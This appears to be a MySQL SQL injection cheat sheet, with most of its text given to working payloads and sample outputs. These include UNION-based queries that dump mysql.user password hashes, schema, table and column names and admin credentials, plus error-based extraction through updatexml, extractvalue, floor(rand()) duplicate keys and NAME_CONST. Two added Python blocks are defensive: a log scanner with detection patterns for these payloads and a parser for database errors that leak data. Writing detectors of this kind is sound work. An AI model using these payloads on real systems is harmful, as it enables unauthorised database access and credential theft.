Important system variables


@@datadir    data directory
@@basedir    installation directory
@@group_concat_max_len     maximum length of the string returned by GROUP_CONCAT
@@version    version number (e.g. 5.5.23)
@@version_comment    version description (e.g. MySQL Community Server (GPL))
@@version_compile_os    operating system (e.g. win32)
@@version_compile_machine  hardware platform (e.g. x86)
@@plugin_dir    plugin directory

Obtaining information with UNION queries


Query basic information

and 1=2 union select concat_ws(0x5f,user(),database(),@@version_comment,version())

Query database users

and 1=2 union select  GROUP_CONCAT(user,0x5f,password) from mysql.user



and 1=2 union select  GROUP_CONCAT(user,0x5f,password) from (select user,password from mysql.user)t


and 1=2 union select  GROUP_CONCAT(s) from (select concat_ws(0x5f,user,password)s from mysql.user)t

Query all databases (if there is more than one)


and 1=2  union select GROUP_CONCAT(schema_name) from information_schema.schemata
and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata)t


and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata where schema_name not in ('information_schema','performance_schema'))t


and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata where schema_name not in (0x696E666F726D6174696F6E5F736368656D61,0x706572666F726D616E63655F736368656D61))t



Query all table names

Note: the length of the string GROUP_CONCAT returns is limited by group_concat_max_len; database() can be replaced by the database name as a hex string (prefixed with 0x).


and 1=2 union select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()


and 1=2 union select GROUP_CONCAT(table_name) from (select * from information_schema.tables where table_schema=database())t

Query all column names of a given table

Note: the database is restricted because a table with the same name may exist in another database.


and 1=2 union select GROUP_CONCAT(column_name) from information_schema.columns where table_name=0x61646D696E and TABLE_SCHEMA=database()


and 1=2 union select GROUP_CONCAT(column_name) from (select * from information_schema.columns where table_name=0x61646D696E and TABLE_SCHEMA=database())t

Query one record from admin, joined with _

Note: CONCAT returns NULL if any of its arguments is NULL; CONCAT_WS does not, but it skips any argument that is NULL.


and 1=2 union select concat(name,0x5F,password,0x5F) from admin limit 1
and 1=2 union select concat_ws(0x5F,name,password) from admin limit 1

Concatenate all rows of admin with commas (each row in the subquery is joined with _)

and 1=2 union select GROUP_CONCAT(s) from (select concat_ws(0x5F,name,password)s from admin)t

Note: the statement above does not use GROUP BY because all rows are needed. Compare:


[and 1=2 union select name,GROUP_CONCAT(s) from (select name,concat_ws(0x5F,name,password)s from admin)t group by name limit 1,1]

Alternatively:

and 1=2  union select GROUP_CONCAT(name,0x5F,password) from admin

Note: the statement above does not use GROUP BY because all rows are needed. Compare:


[and 1=2  union select name,GROUP_CONCAT(name,0x5F,password) from admin group by name limit 1,1]

Guessing the number of columns

and 1=2  union select 1
.....
and 1=2  union select 1,1,.....1,1

The number of 1s in the statement that succeeds equals the number of columns; then pick one of those positions as the best place to display output.


When UNION cannot be used:

order by 10    success
order by 11    error
fields num:10

Or:


group by 10    success
group by 11    error
fields num:10


When the page shows the following after injection:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

the convert() function can be used:

and 1=2  union select convert(GROUP_CONCAT(name,0x5F,password) using latin1) from admin

It seems unhex(hex()) also works:

and 1=2  union select unhex(hex(GROUP_CONCAT(name,0x5F,password))) from admin


Illegal mix of collations for operation 'UNION'

Use the hex function:

and 1=2  union select hex(GROUP_CONCAT(name,0x5F,password)) from admin


Guessing whether a table exists

and 0<>(select count(*) from admin)

Guessing the row count of a table

and 0<(select count(*) from admin) ok
and 1<(select count(*) from admin) no
num:1

Guessing a column name

and 1=(select count(*) from admin where length(name)>0)

Guessing a field length


and 1=(select count(*) from admin where length(name)>6) error
and 1=(select count(*) from admin where length(name)>5) correct, length is 6
and 1=(select count(*) from admin where length(name)=6) correct

id=1 where the 1 is wrapped in single quotes (the ' is not escaped):

'and 1 =2 union select concat_ws(0x5f,user,password) from mysql.user where user!='null

Final statement:

select * from admin where id='1['and 1 =2 union select concat_ws(0x5f,user,password) from mysql.user where user!='null]'

Here the text between [] is the injected statement
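As an added example, not from the original notes: a log-review helper that flags request parameters carrying the UNION building blocks used above (UNION SELECT, information_schema, GROUP_CONCAT, the "and 1=2" prefix, ORDER BY / GROUP BY column-count probes) and decodes 0x hex literals back to the identifiers they stand for, so an analyst can read which table or schema a request referenced. The log lines, addresses and path are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original notes); the 2nd and 3rd requests carry
# the kinds of parameter values discussed above, URL-encoded the way a web server logs them.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01] "GET /item.php?id=1 HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2024:10:00:02] "GET /item.php?id=1+and+1%3D2+union+select+GROUP_CONCAT'
    '(column_name)+from+information_schema.columns+where+table_name%3D0x61646D696E HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2024:10:00:03] "GET /item.php?id=1+order+by+11 HTTP/1.1" 500',
]

REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"\s+(\d{3})')
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")

# Indicator name -> pattern over the URL-decoded query string; the rules mirror this section's
# building blocks: UNION SELECT, information_schema, GROUP_CONCAT, "and 1=2", column probing, hex.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("constant-comparison", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("column-count-probe", re.compile(r"\b(?:order|group)\s+by\s+\d+\b", re.I)),
    ("hex-literal", HEX_LITERAL),
]

def decode_hex_literals(sql):
    """Rewrite 0x.. literals as quoted text, e.g. 0x61646D696E -> 'admin', for the analyst."""
    def repl(m):
        try:
            return "'" + bytes.fromhex(m.group(1)).decode("ascii") + "'"
        except UnicodeDecodeError:
            return m.group(0)  # not printable text: keep the literal unchanged
    return HEX_LITERAL.sub(repl, sql)

def classify(query_string):
    """Return the names of all rules matching one URL query string."""
    decoded = unquote_plus(query_string)
    return [name for name, pat in RULES if pat.search(decoded)]

def scan_access_log(lines):
    """Return one finding per request whose query string matches at least one rule."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m or "?" not in m.group(1):
            continue
        qs = m.group(1).split("?", 1)[1]
        hits = classify(qs)
        if hits:
            findings.append({"client": line.split()[0], "status": int(m.group(2)),
                             "indicators": hits, "decoded": decode_hex_literals(unquote_plus(qs))})
    return findings
```

A 500 status on a column-count probe, as in the third line, is the server-side signal that the ORDER BY guess overshot; pairing the finding with the status lets the reviewer see the probing sequence the notes describe.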



Obtaining information through error messages

1. Error from a non-existent function

sql:select * from t1 where id = a()
inject:a()
error:#1305 - FUNCTION test.a does not exist

The database is test

2. updatexml error (0x5c, 0x7e)

Note: this error message shows at most 32 characters.

sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select version()),0x7e),1)
inject:and updatexml(1,concat(0x7e,(select version()),0x7e),1)
error:#1105 - XPATH syntax error: '~5.5.23~'


Database version is 5.5.23


sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select GROUP_CONCAT(schema_name) from information_schema.schemata),0x7e),1)

Note: this way only part of the output is visible.


sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x5f,(select schema_name from information_schema.schemata limit 1,1),0x5f),1)

Note: this statement does not raise an error (_test_ is a valid XPath name, whereas ~ is not allowed in XPath).


sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1),0x7e),1)
error:#1105 - XPATH syntax error: '~test~'

One database is test


sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=0x74657374 LIMIT 0,1),0x7e),1)
error:#1105 - XPATH syntax error: '~t1~'

One table is t1


sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='t1' LIMIT 0,1),0x7e),1)
error:#1105 - XPATH syntax error: '~id~'

One column is id


sql:SELECT * FROM t1 WHERE id= 1  and updatexml(1,concat(0x7e,(select concat(name,0x3a,pass) from t1 limit 0,1),0x7e),1)
error:#1105 - Character set 'ucs2' is not supported by XPATH
sql:SELECT * FROM t1 WHERE id= 1  and updatexml(1,concat(0x7e,(select hex(concat(name,0x3a,pass)) from t1 limit 0,1),0x7e),1)


sql:SELECT * FROM t1 WHERE id= 1  and updatexml(1,concat(0x7e,(select concat(name) from t1 limit 0,1),0x7e),1)
error:#1105 - XPATH syntax error: '~ad123~'

The value of the name column is ad123


3. Error via floor(): Duplicate entry

sql:SELECT * FROM t1 WHERE id= 1   and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a)
error:#1062 - Duplicate entry '5.5.231' for key 'group_key'

Database version is 5.5.231


sql:SELECT * FROM t1 WHERE id= 1   and (select 1 from  (select count(*),concat(user(),floor(rand(0)*2))x from  information_schema.tables  group by x)a)
error:#1062 - Duplicate entry 'test@localhost1' for key 'group_key'

The user is test@localhost


sql:SELECT * FROM t1 WHERE id= 1  and (select 1 from  (select count(*),concat((select concat(pass) from test.t2 where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);

Replacing the first argument of concat with a subquery does not produce the Duplicate entry error; the reason is unclear.

Note: on closer analysis, the data returned by the subquery must have a "unique" property (a matter of the table's own structure, not of the value itself being unique), e.g. id is the primary key, name is unique, pass has no key property. So id; name; concat(id); concat(id,name) etc. raise the error, while pass; concat(pass); concat(id,pass) etc. do not.


4. extractvalue error (0x5c, 0x7e)

Note: limited to 32 characters


One table at a time

SELECT * FROM t1 WHERE id= 1 and extractvalue(1, concat(0x7e, (select table_name from information_schema.tables limit 0,1)));

Several tables at a time (three here)

SELECT * FROM t1 WHERE id= 1 and extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables limit 0,3)));


5. Injection using NAME_CONST (MySQL version >= 5.0.12)

Note: on newer versions (confirmed for > 5.1.35, others untested) this fails with: Incorrect arguments to NAME_CONST; the arguments must be constants.

SELECT * FROM t1 WHERE id= 1 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)


SELECT * FROM test.t1 WHERE id= 1 and 1=(select * from (select NAME_CONST((select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1),NAME_CONST((1),1)) as x)


Obtaining columns through errors

Note: it seems at least one column must already be known

SELECT * FROM test.t1 WHERE id= 1 and (select * from(select * from  test.t2 a join test.t2 b using(id,name))c);
error:Duplicate column name 'pass'

Another column is pass


SELECT * FROM test.t1 WHERE id= 1 and (select * from(select * from  test.t2 a join test.t2 b using(id,name,pass))c);

Another column is sta
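An added defensive example, not part of the original notes: a parser for the MySQL error strings quoted in this section (#1305 unknown function, #1105 XPATH syntax error, #1062 Duplicate entry) that recovers the text leaked between the ~ markers or in front of the floor(rand(0)*2) digit, so a review of application error logs shows exactly what each error channel exposed. The log lines and host name are constructed.

```python
import re

# Constructed application error-log lines (not from the original notes); the message bodies use
# the MySQL error formats quoted in this section plus two that leak nothing useful.
SAMPLE_ERRORS = [
    "2024-01-01T10:00:01Z web-1 db error: #1105 - XPATH syntax error: '~5.5.23~'",
    "2024-01-01T10:00:02Z web-1 db error: #1062 - Duplicate entry 'test@localhost1' for key 'group_key'",
    "2024-01-01T10:00:03Z web-1 db error: #1305 - FUNCTION test.a does not exist",
    "2024-01-01T10:00:04Z web-1 db error: #1105 - Character set 'ucs2' is not supported by XPATH",
    "2024-01-01T10:00:05Z web-1 db error: #1146 - Table 'test.missing' doesn't exist",
]

ERROR_LINE = re.compile(r"#(\d{4}) - (.*)$")

# (MySQL error number, pattern over the message, leak channel). The ~ markers come from the
# 0x7e wrapping used with updatexml/extractvalue; the trailing 0/1 stripped from the duplicate
# key value is the floor(rand(0)*2) appended in the GROUP BY technique.
LEAK_PATTERNS = [
    (1105, re.compile(r"XPATH syntax error: '~(.*?)~?'"), "xpath-marker"),
    (1062, re.compile(r"Duplicate entry '(.*)[01]' for key 'group_key'"), "floor-rand-duplicate"),
    (1305, re.compile(r"FUNCTION (\w+)\.\w+ does not exist"), "schema-from-function"),
]

def parse_leak(line):
    """Return (error number, channel, leaked text), or None when the line leaks nothing."""
    m = ERROR_LINE.search(line)
    if not m:
        return None
    errno, msg = int(m.group(1)), m.group(2)
    for num, pat, channel in LEAK_PATTERNS:
        hit = pat.search(msg) if errno == num else None
        if hit:
            return errno, channel, hit.group(1)
    return None

def summarize(lines):
    """Collect leaks and count them per channel so a reviewer sees which technique is in use."""
    found = [leak for leak in map(parse_leak, lines) if leak]
    counts = {}
    for _, channel, _ in found:
        counts[channel] = counts.get(channel, 0) + 1
    return found, counts
```

If these messages ever reached a client, the application is echoing database errors; the durable fix is to log them server-side and return a generic error to the user, and the per-channel counts show whether that control is missing.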